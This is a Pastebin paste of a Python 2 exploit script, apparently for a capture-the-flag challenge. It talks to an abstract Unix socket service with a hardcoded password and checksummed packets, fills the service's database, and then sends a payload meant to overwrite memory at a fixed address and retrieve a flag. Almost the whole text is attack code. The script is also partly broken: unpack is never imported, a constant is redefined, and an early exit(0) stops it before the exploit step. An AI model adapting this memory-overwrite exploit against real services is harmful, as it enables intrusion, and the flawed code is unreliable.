Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- from struct import pack
- import sys
- import zlib
- srv_addr = "\x00secretSock"
- PASSWORD = "DA777"
- testHash = "f312e0cbe28c22ad7e6c46b989804e2c"
- BUFFER_HEADER_LENGTH = 8 + len(PASSWORD) + 1
- BUFFER_LENGTH = 269
- ANSWER_PACKET_LENGTH = 256
- OVERWRITE_ADDR = 0x603108
- #OVERWRITE_DATA_ADDR = -0x7fffffffdfc0 # offset to flag location (which is empty ATM)
- OVERWRITE_DATA_ADDR = 0xffffffffffffffff # offset to flag location (which is empty ATM)
- OVERWRITE_DATA_ADDR = '\xff' * 16# offset to flag location (which is empty ATM)
- sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
- def hexdump(src, length=16):
- FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
- lines = []
- for c in xrange(0, len(src), length):
- chars = src[c:c+length]
- hex = ' '.join(["%02x" % ord(x) for x in chars])
- printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
- lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable))
- return ''.join(lines)
- def db(v):
- return pack("<B", v)
- def dw(v):
- return pack("<H", v)
- def dd(v):
- return pack("<I", v)
- def dq(v):
- return pack("<Q", v)
- def rb(v):
- return unpack("<B", v[0])[0]
- def rw(v):
- return unpack("<H", v[:2])[0]
- def rd(v):
- return unpack("<I", v[:4])[0]
- def rq(v):
- return unpack("<Q", v[:8])[0]
- def connectToServer():
- try:
- sock.connect(srv_addr)
- except socket.error, msg:
- print("Socket connect error: ", msg)
- sys.exit(1)
- return sock
- def sendData(buf, operation):
- if len(buf) == 0:
- buf = "\x00"*(BUFFER_LENGTH - BUFFER_HEADER_LENGTH) # create empty buffer
- else:
- buf += "\x00"*(BUFFER_LENGTH - (BUFFER_HEADER_LENGTH + len(buf))) # fill with zeros
- if not isinstance(operation, int):
- print("Operation must be int")
- return ""
- if len(buf) != (BUFFER_LENGTH - BUFFER_HEADER_LENGTH):
- print("buffer length (%d) is too long or too short!" % len(buf))
- print hexdump(buf)
- return ""
- header = dq(0)
- header += PASSWORD
- header += db(operation)
- payload = header + buf
- payload_hash = zlib.adler32(payload)
- payload = dq(payload_hash) + payload[8:]
- len_sent = sock.send(payload)
- if len_sent != BUFFER_LENGTH:
- print("Error: Didn't sent all buffer, sent only %d" % len_sent)
- data = sock.recv(ANSWER_PACKET_LENGTH)
- print "Recived %d bytes" % len(data)
- print hexdump(data)
- return data
- print 'Connecting to server...'
- connectToServer()
- if sendData("",1): # init connection (and server init db data)
- print("Connected successfully")
- # populate db
- sendData("", 4)
- payload = dq(1 * 256)
- if sendData(payload, 3):
- print "Done 0"
- payload = dq(2 * 256)
- if sendData(payload, 3):
- print "Done 1"
- payload = dq(3 * 256)
- if sendData(payload, 3):
- print "Done 2"
- sock.close()
- exit(0)
- # overwrite payload
- payload = testHash
- payload += OVERWRITE_DATA_ADDR
- payload += dq(OVERWRITE_ADDR)
- print 'Sending exploit...'
- if sendData(payload, 2):
- # get flag
- print 'Getting flag...'
- sendData("", 4)
- print 'closing socket'
- sock.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement